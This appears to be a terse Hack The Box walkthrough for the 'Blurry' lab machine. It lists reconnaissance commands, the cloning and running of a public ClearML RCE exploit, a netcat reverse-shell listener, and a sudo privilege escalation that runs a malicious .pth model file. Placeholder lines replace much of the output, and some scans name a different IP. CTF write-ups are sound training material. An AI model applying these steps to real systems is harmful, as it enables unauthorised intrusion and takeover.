Blurry

Blurry


HTB Linux

nmap -A -p- -oA blurry 10.10.11.19 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA blurry 10.10.11.19

echo "10.10.11.19 blurry.htb app.blurry.htb api.blurry.htb files.blurry.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -sU -O -p- -oA blurry-udp 10.10.11.19

ping -c 1 10.10.11.19

ssh_command.

nmap -p- --open -T5 -v -n 10.10.11.145

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.145 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p22,80 10.10.11.19 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://10.10.11.19

ssh_command. wfuzz -c --hc=302,404,403,400 -t 200 -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.11.19/ -H "Host: FUZZ.blurry.htb"

ssh_command.

Nos dirigimos a http://app.blurry.htb

ssh_command.

http://app.blurry.htb/settings

ssh_command.

No encontre nada en searchsploit

Nos dirigimos a experiments

ssh_command.

ssh_command.

creamos nuevas credenciales

clearml-init

ssh_command.

git clone https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit.git

cd CVE-2024-24590-ClearML-RCE-Exploit

pip install -r requirements.txt

python3 exploit.py

ssh_command.

nc -lvnp 9001

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm

ssh_command.

ls -ahl

ssh_command.

chmod 600 id_rsa

ssh -i id_rsa jippity@10.10.11.19

ssh_command.

vim exploit.py

ssh_command.

python3 exploit.py

cat exploit.py > exploit.pth

tar -cvf my_files.tar exploit.pth exploit.py

cp my_files.tar /models

cp exploit.pty /models

cp exploit.pth /models

sudo /usr/bin/evaluate_model /models/exploit.pth

ssh_command.

ssh_command.

nc -lvnp 9001

ssh_command.

© 2024 Cu3rv0x